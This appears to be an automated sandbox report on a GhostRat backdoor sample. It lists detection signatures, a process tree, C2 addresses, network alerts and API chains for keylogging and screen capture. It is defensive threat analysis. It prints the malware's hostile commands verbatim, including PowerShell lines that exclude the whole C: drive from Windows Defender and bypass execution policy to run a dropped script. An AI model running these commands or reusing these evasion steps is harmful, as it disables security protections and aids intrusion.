Windows Analysis Report
HGwpjJUqhW.exe

Overview

General Information

Sample name: HGwpjJUqhW.exe (renamed because original name is a hash value)
Original sample name: e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547.exe
Analysis ID: 1584088
MD5: c4503d77f7a1bd9ad2b198d01e69bc43
SHA1: fbfe0b4981d65ee16d16fcff20b168f6c374c07f
SHA256: e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547
Tags: backdoor, exe, winos, user-zhuzhu0009

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • HGwpjJUqhW.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\HGwpjJUqhW.exe" MD5: C4503D77F7A1BD9AD2B198D01E69BC43)
    • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7480 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • HGwpjJUqhW.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe" MD5: C4503D77F7A1BD9AD2B198D01E69BC43)
      • cmd.exe (PID: 4548 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6560 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2996 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3696 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7692 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7868 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7916 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"C2 url": ["118.107.44.219:19091", "118.107.44.219:19092"]}
Source | Rule | Description | Author | Strings
HGwpjJUqhW.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
HGwpjJUqhW.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

Source | Rule | Description | Author | Strings
5.2.HGwpjJUqhW.exe.3401004.4.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.HGwpjJUqhW.exe.46c2c53.5.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.HGwpjJUqhW.exe.a3301b.1.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

                              System Summary

                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HGwpjJUqhW.exe", ParentImage: C:\Users\user\Desktop\HGwpjJUqhW.exe, ParentProcessId: 7344, ParentProcessName: HGwpjJUqhW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7428, ProcessName: cmd.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HGwpjJUqhW.exe", ParentImage: C:\Users\user\Desktop\HGwpjJUqhW.exe, ParentProcessId: 7344, ParentProcessName: HGwpjJUqhW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 7868, ProcessName: cmd.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 7916, ProcessName: powershell.exe
                              Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7480, ProcessName: powershell.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7480, ProcessName: powershell.exe
                              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                              2025-01-04T05:38:50.993382+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 118.107.44.219 | 19091 | TCP
                              2025-01-04T05:40:01.363847+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 118.107.44.219 | 19091 | TCP
                              2025-01-04T05:41:05.444765+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 118.107.44.219 | 19091 | TCP
                              2025-01-04T05:42:18.020381+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 118.107.44.219 | 19091 | TCP

                              AV Detection

                              Source: HGwpjJUqhW.exe.7652.5.memstrmin, Malware Configuration Extractor: GhostRat {"C2 url": ["118.107.44.219:19091", "118.107.44.219:19092"]}
                              Source: HGwpjJUqhW.exe, Virustotal: Detection: 12%
                              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.5% probability
                              Source: pc_yyb_2700200680_installer.exe.0.dr, Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_7a88b8ee-5)

                              Compliance

                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe, Unpacked PE file: 0.2.HGwpjJUqhW.exe.400000.0.unpack
                              Source: HGwpjJUqhW.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: unknown, HTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49735 version: TLS 1.2
                              Source: Binary string: \Release\Code_Shellcode.pdb source: HGwpjJUqhW.exe, HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdb source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb& source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb$ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp4 source: powershell.exe, 0000000B.00000002.1814728739.00000000081E1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdbN source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, [:
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: c:
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Code function: 5_2_036280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_036280F0

                              Networking

                              Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49743 -> 118.107.44.219:19091
                              Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49744 -> 118.107.44.219:19091
                              Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50012 -> 118.107.44.219:19091
                              Source: Malware configuration extractor, URLs: 118.107.44.219:19091
                              Source: Malware configuration extractor, URLs: 118.107.44.219:19092
                              Source: global traffic, TCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
                              Source: global traffic, TCP traffic: 192.168.2.4:49733 -> 118.107.44.219:8853
                              Source: Joe Sandbox View, IP Address: 118.107.44.219
                              Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG
                              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknown, TCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe, Code function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                              Source: global traffic, HTTP traffic detected: GET /pc_yyb_2700200680_installer.exe HTTP/1.1, User-Agent: URLDownloader, Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com, Cache-Control: no-cache
                              Source: global traffic, DNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                              Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknown HTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49735 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: [esc] 5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                              Source: Yara match File source: HGwpjJUqhW.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: HGwpjJUqhW.exe PID: 7344, type: MEMORYSTR
                              Source: Yara match File source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Process Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Code function: 0_2_026218A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362B463 ExitWindowsEx
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362B43F ExitWindowsEx
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362B41B ExitWindowsEx
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: String function: 03634300 appears 32 times
                              Source: HGwpjJUqhW.exe Static PE information: invalid certificate
                              Source: pc_yyb_2700200680_installer[1].exe.0.dr Static PE information: Resource name: CUSTOM type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Source: pc_yyb_2700200680_installer[1].exe.0.dr Static PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
                              Source: pc_yyb_2700200680_installer.exe.0.dr Static PE information: Resource name: CUSTOM type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Source: pc_yyb_2700200680_installer.exe.0.dr Static PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
                              Source: HGwpjJUqhW.exe Binary or memory string: OriginalFilenameV vs HGwpjJUqhW.exe
                              Source: HGwpjJUqhW.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/29@1/2
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03627B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_03627B70
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03627740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_03627740
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03627620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_03627620
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03626C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,5_2_03626C50
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Code function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Code function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File created: C:\Users\user\Desktop\Logs
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Mutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_hgwpjjuqhw_Mutex_user_WinSta0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_hgwpjjuqhw_Mutex
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Mutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_hgwpjjuqhw
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Mutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Mutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xml
                              Source: Yara match File source: HGwpjJUqhW.exe, type: SAMPLE
                              Source: Yara match File source: 0.2.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.0.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000002.2089018871.0000000000403000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000000.1671468672.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: HGwpjJUqhW.exe Virustotal: Detection: 12%
